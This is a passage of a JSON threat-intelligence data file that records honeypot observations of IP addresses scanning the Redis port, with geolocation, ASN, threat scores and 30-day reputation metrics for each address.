      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 33.6,
      "threat_level": "low",
      "score_components": {
        "frequency": 13.2,
        "persistence": 9.2,
        "diversity": 8,
        "spread": 20,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 21,
        "days_active_30d": 11,
        "ports_targeted_30d": 4,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-11T03:54:19.393000+00:00",
        "last_seen_30d": "2026-03-21T09:33:24.698000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 8,
        "Redishoneypot": 6,
        "Cowrie": 4,
        "Honeytrap": 3
      }
    },
    "66.132.153.134": {
      "attack_count": 12,
      "first_seen": "2026-03-13T23:31:35.000Z",
      "last_seen": "2026-03-13T23:32:44.057Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 53.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 18.8,
        "persistence": 16.7,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 75,
        "days_active_30d": 20,
        "ports_targeted_30d": 26,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T06:57:13.729000+00:00",
        "last_seen_30d": "2026-03-21T18:28:42.215000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 41,
        "Honeytrap": 23,
        "Redishoneypot": 6,
        "ElasticPot": 4,
        "Sentrypeer": 1
      }
    },
    "66.132.172.128": {
      "attack_count": 12,
      "first_seen": "2026-03-26T22:37:04.000Z",
      "last_seen": "2026-03-26T22:38:06.858Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 67.7,
      "threat_level": "high",
      "score_components": {
        "frequency": 20.9,
        "persistence": 9.2,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 123,
        "days_active_30d": 11,
        "ports_targeted_30d": 29,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-20T23:56:22+00:00",
        "last_seen_30d": "2026-03-30T12:38:45.769000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 79,
        "Honeytrap": 30,
        "ElasticPot": 8,
        "Redishoneypot": 6
      }
    },
    "78.128.114.126": {
      "attack_count": 12,
      "first_seen": "2026-03-06T08:16:56.000Z",
      "last_seen": "2026-03-25T06:07:57.360Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Bulgaria",
      "country_code": "BG",
      "city": null,
      "asn": 50360,
      "as_org": "Tamatiya EOOD",
      "threat_score": 62.5,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 20.0,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 26743,
        "days_active_30d": 24,
        "ports_targeted_30d": 26712,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T07:27:43.514000+00:00",
        "last_seen_30d": "2026-03-26T13:17:19.637000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 26743
      }
    },
    "147.185.132.51": {
      "attack_count": 10,
      "first_seen": "2026-03-03T05:45:42.000Z",
      "last_seen": "2026-03-03T05:47:19.855Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 81.3,
      "threat_level": "critical",
      "score_components": {
        "frequency": 19.9,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 98,
        "days_active_30d": 29,
        "ports_targeted_30d": 34,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T06:35:53+00:00",
        "last_seen_30d": "2026-03-30T01:02:48.066000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 74,
        "Honeytrap": 20,
        "Redishoneypot": 3,
        "Dionaea": 1
      }
    },
    "175.30.48.64": {
      "attack_count": 10,
      "first_seen": "2026-03-02T15:53:57.000Z",
      "last_seen": "2026-03-02T15:55:08.673Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 2.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 5,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T15:53:58+00:00",
        "last_seen_30d": "2026-03-02T15:55:08.673000+00:00",
        "days_since_last_seen": 29
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 4,
        "Suricata": 1
      }
    },
    "18.97.26.56": {
      "attack_count": 10,
      "first_seen": "2026-03-03T17:01:20.000Z",
      "last_seen": "2026-03-03T17:02:25.554Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 14.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 13.4,
        "persistence": 8.3,
        "diversity": 4,
        "spread": 15,
        "recency_factor": 0.37
      },
      "reputation_metrics": {
        "total_events_30d": 22,
        "days_active_30d": 10,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-03T17:01:20+00:00",
        "last_seen_30d": "2026-03-12T20:29:29.126000+00:00",
        "days_since_last_seen": 19
      },
      "honeypot_breakdown_30d": {
        "Suricata": 12,
        "Honeytrap": 7,
        "Redishoneypot": 3
      }
    },
    "183.56.183.136": {
      "attack_count": 10,
      "first_seen": "2026-03-14T09:57:41.000Z",
      "last_seen": "2026-03-27T21:53:56.928Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 18.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 11.7,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 14,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-14T09:58:42.353000+00:00",
        "last_seen_30d": "2026-03-27T21:53:56.928000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "85.217.140.37": {
      "attack_count": 10,
      "first_seen": "2026-03-08T13:48:59.000Z",
      "last_seen": "2026-03-08T13:50:08.963Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "France",
      "country_code": "FR",
      "city": "Gravelines",
      "asn": 209334,
      "as_org": "Modat B.V.",
      "threat_score": 97.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 29.5,
        "persistence": 23.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 890,
        "days_active_30d": 28,
        "ports_targeted_30d": 493,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-04T13:54:24+00:00",
        "last_seen_30d": "2026-03-31T15:59:32.690000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 510,
        "Honeytrap": 375,
        "Redishoneypot": 3,
        "Honeyaml": 1,
        "Medpot": 1
      }
    },
    "13.58.203.73": {
      "attack_count": 9,
      "first_seen": "2026-03-10T11:21:10.000Z",
      "last_seen": "2026-03-10T11:22:13.691Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 21.1,
      "threat_level": "low",
      "score_components": {
        "frequency": 24.7,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 292,
        "days_active_30d": 1,
        "ports_targeted_30d": 159,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-10T11:21:10+00:00",
        "last_seen_30d": "2026-03-10T11:31:21.055000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Suricata": 162,
        "Honeytrap": 110,
        "Dionaea": 9,
        "Cowrie": 4,
        "Miniprint": 3,
        "Adbhoney": 2,
        "Redishoneypot": 2
      }
    },
    "198.235.24.106": {
      "attack_count": 9,
      "first_seen": "2026-03-20T20:43:29.000Z",
      "last_seen": "2026-03-20T20:45:07.430Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 76.5,
      "threat_level": "high",
      "score_components": {
        "frequency": 20.0,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 100,
        "days_active_30d": 29,
        "ports_targeted_30d": 29,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T01:36:15+00:00",
        "last_seen_30d": "2026-03-30T02:59:46.451000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 65,
        "Honeytrap": 32,
        "Redishoneypot": 3
      }
    },
    "205.210.31.107": {
      "attack_count": 9,
      "first_seen": "2026-03-25T00:36:24.000Z",
      "last_seen": "2026-03-25T00:38:04.439Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 85.5,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.5,
        "persistence": 25,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 111,
        "days_active_30d": 30,
        "ports_targeted_30d": 29,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T13:35:33+00:00",
        "last_seen_30d": "2026-03-31T19:28:56.455000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 75,
        "Honeytrap": 29,
        "Cowrie": 4,
        "Redishoneypot": 3
      }
    },
    "205.210.31.78": {
      "attack_count": 9,
      "first_seen": "2026-03-02T04:13:40.000Z",
      "last_seen": "2026-03-02T04:15:19.287Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 86.9,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.8,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 119,
        "days_active_30d": 29,
        "ports_targeted_30d": 38,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T04:13:40+00:00",
        "last_seen_30d": "2026-03-30T19:21:05.666000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 80,
        "Honeytrap": 34,
        "Redishoneypot": 3,
        "CitrixHoneypot": 1,
        "Dionaea": 1
      }
    },
    "39.105.202.192": {
      "attack_count": 9,
      "first_seen": "2026-03-15T06:08:58.000Z",
      "last_seen": "2026-03-15T06:10:03.164Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 20.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 11.5,
        "persistence": 3.3,
        "diversity": 6,
        "spread": 15,
        "recency_factor": 0.57
      },
      "reputation_metrics": {
        "total_events_30d": 14,
        "days_active_30d": 4,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-15T06:08:59+00:00",
        "last_seen_30d": "2026-03-18T02:07:11.321000+00:00",
        "days_since_last_seen": 13
      },
      "honeypot_breakdown_30d": {
        "Suricata": 9,
        "Redishoneypot": 3,
        "Honeytrap": 2
      }
    },
    "43.248.109.245": {
      "attack_count": 9,
      "first_seen": "2026-03-25T03:30:12.000Z",
      "last_seen": "2026-03-25T03:55:43.637Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 15.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-25T03:30:12+00:00",
        "last_seen_30d": "2026-03-25T03:55:43.637000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "47.233.120.180": {
      "attack_count": 9,
      "first_seen": "2026-03-18T16:42:43.000Z",
      "last_seen": "2026-03-18T16:43:50.931Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Swansea",
      "asn": 20115,
      "as_org": "Charter Communications LLC",
      "threat_score": 10.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.57
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-18T16:42:43+00:00",
        "last_seen_30d": "2026-03-18T16:43:50.931000+00:00",
        "days_since_last_seen": 13
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "52.226.214.210": {
      "attack_count": 9,
      "first_seen": "2026-03-18T13:03:51.000Z",
      "last_seen": "2026-03-18T13:04:57.203Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 10.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.57
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-18T13:03:52+00:00",
        "last_seen_30d": "2026-03-18T13:04:57.203000+00:00",
        "days_since_last_seen": 13
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "142.93.255.85": {
      "attack_count": 8,
      "first_seen": "2026-03-11T10:46:16.000Z",
      "last_seen": "2026-03-28T00:48:58.340Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 62.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 15.3,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 34,
        "days_active_30d": 29,
        "ports_targeted_30d": 31,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T20:08:12.310000+00:00",
        "last_seen_30d": "2026-03-30T12:36:03.539000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 34
      }
    },
    "118.212.121.21": {
      "attack_count": 7,
      "first_seen": "2026-03-31T23:18:37.000Z",
      "last_seen": "2026-03-31T23:28:53.494Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 15.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-31T23:18:40+00:00",
        "last_seen_30d": "2026-03-31T23:28:53.494000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 1,
        "Suricata": 1
      }
    },
    "137.184.166.106": {
      "attack_count": 7,
      "first_seen": "2026-03-11T12:25:10.000Z",
      "last_seen": "2026-03-11T12:26:42.878Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": "Toronto",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 21.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 30,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 1888,
        "days_active_30d": 1,
        "ports_targeted_30d": 1897,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-11T12:04:17.228000+00:00",
        "last_seen_30d": "2026-03-11T13:30:00.124000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1874,
        "Honeytrap": 12,
        "Redishoneypot": 2
      }
    },
    "23.92.27.206": {
      "attack_count": 6,
      "first_seen": "2026-03-08T12:42:02.000Z",
      "last_seen": "2026-03-08T12:43:09.878Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Fremont",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.3,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 170,
        "days_active_30d": 30,
        "ports_targeted_30d": 165,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T04:28:04.637000+00:00",
        "last_seen_30d": "2026-03-31T18:56:39.219000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 170
      }
    },
    "41.223.51.250": {
      "attack_count": 6,
      "first_seen": "2026-03-02T14:13:48.000Z",
      "last_seen": "2026-03-02T14:14:49.083Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Guinea",
      "country_code": "GN",
      "city": "Conakry",
      "asn": 37665,
      "as_org": "MouNa",
      "threat_score": 0.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T14:14:49.083000+00:00",
        "last_seen_30d": "2026-03-02T14:14:49.083000+00:00",
        "days_since_last_seen": 29
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "45.79.109.236": {
      "attack_count": 6,
      "first_seen": "2026-03-03T12:43:06.000Z",
      "last_seen": "2026-03-03T12:44:14.367Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Fremont",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.3,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 170,
        "days_active_30d": 30,
        "ports_targeted_30d": 160,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:09:48.336000+00:00",
        "last_seen_30d": "2026-03-31T16:08:29.299000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 170
      }
    },
    "66.132.195.157": {
      "attack_count": 6,
      "first_seen": "2026-03-30T22:43:07.000Z",
      "last_seen": "2026-03-30T22:44:45.111Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 53.5,
      "threat_level": "medium",
      "score_components": {
        "frequency": 21.8,
        "persistence": 6.7,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 152,
        "days_active_30d": 8,
        "ports_targeted_30d": 144,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-24T03:59:17.118000+00:00",
        "last_seen_30d": "2026-03-31T17:31:03.821000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 152
      }
    },
    "101.35.251.162": {
      "attack_count": 5,
      "first_seen": "2026-03-10T10:53:26.000Z",
      "last_seen": "2026-03-10T10:54:27.391Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 2.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-10T10:54:27.391000+00:00",
        "last_seen_30d": "2026-03-10T10:54:27.391000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "104.248.126.157": {
      "attack_count": 5,
      "first_seen": "2026-03-11T07:16:12.000Z",
      "last_seen": "2026-03-11T07:17:46.241Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 9.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 8.5,
        "persistence": 1.7,
        "diversity": 14,
        "spread": 5,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 2,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-10T11:08:57.449000+00:00",
        "last_seen_30d": "2026-03-11T09:43:46.041000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7
      }
    },
    "113.249.112.198": {
      "attack_count": 5,
      "first_seen": "2026-03-18T12:17:42.000Z",
      "last_seen": "2026-03-18T12:18:46.244Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 134420,
      "as_org": "Chongqing Telecom",
      "threat_score": 4.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.57
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-18T12:18:46.244000+00:00",
        "last_seen_30d": "2026-03-18T12:18:46.244000+00:00",
        "days_since_last_seen": 13
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "113.44.65.192": {
      "attack_count": 5,
      "first_seen": "2026-03-06T04:16:42.000Z",
      "last_seen": "2026-03-06T04:17:43.154Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 55990,
      "as_org": "Huawei Cloud Service data center",
      "threat_score": 1.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.17
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-06T04:17:43.154000+00:00",
        "last_seen_30d": "2026-03-06T04:17:43.154000+00:00",
        "days_since_last_seen": 25
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "119.45.38.38": {
      "attack_count": 5,
      "first_seen": "2026-03-22T16:09:00.000Z",
      "last_seen": "2026-03-22T16:10:02.919Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Nanjing",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 5.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-22T16:10:02.919000+00:00",
        "last_seen_30d": "2026-03-22T16:10:02.919000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "123.56.169.187": {
      "attack_count": 5,
      "first_seen": "2026-03-16T14:22:34.000Z",
      "last_seen": "2026-03-16T14:23:38.650Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 3.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.5
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-16T14:23:38.650000+00:00",
        "last_seen_30d": "2026-03-16T14:23:38.650000+00:00",
        "days_since_last_seen": 15
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "124.220.60.188": {
      "attack_count": 5,
      "first_seen": "2026-03-29T02:32:25.000Z",
      "last_seen": "2026-03-29T02:33:31.062Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 7.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-29T02:33:31.062000+00:00",
        "last_seen_30d": "2026-03-29T02:33:31.062000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "139.199.180.110": {
      "attack_count": 5,
      "first_seen": "2026-03-05T14:51:43.000Z",
